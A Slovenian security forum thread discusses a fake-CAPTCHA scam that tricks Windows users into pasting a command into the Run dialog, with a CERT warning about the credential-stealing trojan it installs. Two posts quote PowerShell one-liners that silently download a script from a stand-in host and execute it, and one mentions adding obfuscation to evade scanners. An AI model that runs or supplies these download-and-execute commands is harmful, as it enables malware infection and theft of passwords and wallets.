Forum » Informacijska varnost » Nov način napada a Winsih
Nov način napada a Winsih
DamijanD ::
Večina ST populacije sicer ne bi smela imeti težav s tem načinom. A mogoče ni slabo, da se omeni še kakšnemu starejšemu:
https://www.rtvslo.si/crna-kronika/si-c...
"V naslednjem koraku CAPTCHA obrazec javi napako in od uporabnika zahteva pritisk kombinacij na tipkovnici Win + R, Ctrl + V in Enter. Pri tem se s kombinacijo tipk Win + R v operacijskih sistemih Windows odpre okno za vnos ukaza, kombinacija tipk CTRL + V v vnosno polje prilepi vsebino odložišča, s pritiskom na tipko Enter pa se zažene vpisan ukaz."
https://www.rtvslo.si/crna-kronika/si-c...
"V naslednjem koraku CAPTCHA obrazec javi napako in od uporabnika zahteva pritisk kombinacij na tipkovnici Win + R, Ctrl + V in Enter. Pri tem se s kombinacijo tipk Win + R v operacijskih sistemih Windows odpre okno za vnos ukaza, kombinacija tipk CTRL + V v vnosno polje prilepi vsebino odložišča, s pritiskom na tipko Enter pa se zažene vpisan ukaz."
- spremenilo: DamijanD ()
stroy ::
Če ima kdo CTRL + V kodo, bi prosil da se objavi.
sem sam našel en primer
powershell.exe -W Hidden -command $url = 'https://example.com/uploads/inur4.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
še ena beda od windowsow, če hočem naložit kul program za extract passw iz email klientov moram disejblat 5 stvari, en vrstica v run command pa naloži trojanca
ah ja, dobr da nimajo konkurence, drugač bi že propadl...
sem sam našel en primer
powershell.exe -W Hidden -command $url = 'https://example.com/uploads/inur4.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
še ena beda od windowsow, če hočem naložit kul program za extract passw iz email klientov moram disejblat 5 stvari, en vrstica v run command pa naloži trojanca
ah ja, dobr da nimajo konkurence, drugač bi že propadl...
Zgodovina sprememb…
- spremenil: stroy ()
JanBrezov ::
Sem vprašal UI in mi predlaga ukaz za powershell:
Na PowerShell se ne spoznam, ampak od oke tole potegne dol PS skripto z navedenaga URL-ja in izvede. V skripti pa je verjetno lahko karkoli. Verjetno je del navodil to, da naj uporabnik povsod klikne "da". Potem k temu dodaš code obfuscation za obhod skenerjev in je to to.
https://www.securonix.com/blog/hiding-t...
IEX (New-Object Net.WebClient).DownloadString('http://malicious-url.com/script.ps1')Na PowerShell se ne spoznam, ampak od oke tole potegne dol PS skripto z navedenaga URL-ja in izvede. V skripti pa je verjetno lahko karkoli. Verjetno je del navodil to, da naj uporabnik povsod klikne "da". Potem k temu dodaš code obfuscation za obhod skenerjev in je to to.
https://www.securonix.com/blog/hiding-t...
Zgodovina sprememb…
- spremenil: JanBrezov ()
tomlin ::
Ravno danes sem dobil opozorilo od si-cert v moj poštni predal.
Za tega trojanskega konja je značilna kraja uporabniških podatkov, kot so shranjena gesla v brskalnikih in upravljalnikih gesel, zgodovine brskanja, shranjenih spletnih piškotkov, drugih shranjenih podatkov spletnih mest, podatkov o odprtih zavihkih, zasebnih ključev kriptodenarnic iz razširitev brskalnika.... Preberite!
https://www.cert.si/si-cert-2025-02/
Za tega trojanskega konja je značilna kraja uporabniških podatkov, kot so shranjena gesla v brskalnikih in upravljalnikih gesel, zgodovine brskanja, shranjenih spletnih piškotkov, drugih shranjenih podatkov spletnih mest, podatkov o odprtih zavihkih, zasebnih ključev kriptodenarnic iz razširitev brskalnika.... Preberite!
https://www.cert.si/si-cert-2025-02/
Svoboda in enakost ni isto kot svoboda.
M. Friedman
M. Friedman
Ales ::
To je zgleda napredna podvrsta tistih albanskih virusov izpred davnih let...
Tole je zgleda verzija 2.0?
Ni kaj, tehnologija gre naprej...
albanski_virus_v1.0 Dragi uporabnik računalnika! Sem albanski virus! Kot verjetno veste, je naše programiranje bolj v povojih, zato te prosim, da po prejemu tega sporočila formatiraš trdi disk tvojega računalnika in nato pošlješ virus naprej kontaktom iz tvojega imenika! Hvala! albanski_virus_v1.1 Prosim NAJPREJ pošlji virus naprej, nato formatiraj računalnik!
Tole je zgleda verzija 2.0?
Ni kaj, tehnologija gre naprej...
Zgodovina sprememb…
- spremenil: Ales ()
OK.d ::
Tole z captcho je že rahlo anoying, ko moraš semaforje in avtobuse klikat, ni čudno da se potem takšni trojanci pojavljajo in so celo uspešni.
LPOK.d
feryz ::
Moraš biti extra neumen, da se tega greš.
Ampak ja, če je v vseh medijih, potem očitno taki obstajajo. Da si zelo počasi, korak po korak, zagrenijo življenje.
Me pa zanima, če je za bolj nevešče, na voljo tudi telefonska pomoč.
Če se jim slučajno zalomi pri poganjanju trojanca.
Ampak ja, če je v vseh medijih, potem očitno taki obstajajo. Da si zelo počasi, korak po korak, zagrenijo življenje.
Me pa zanima, če je za bolj nevešče, na voljo tudi telefonska pomoč.
Če se jim slučajno zalomi pri poganjanju trojanca.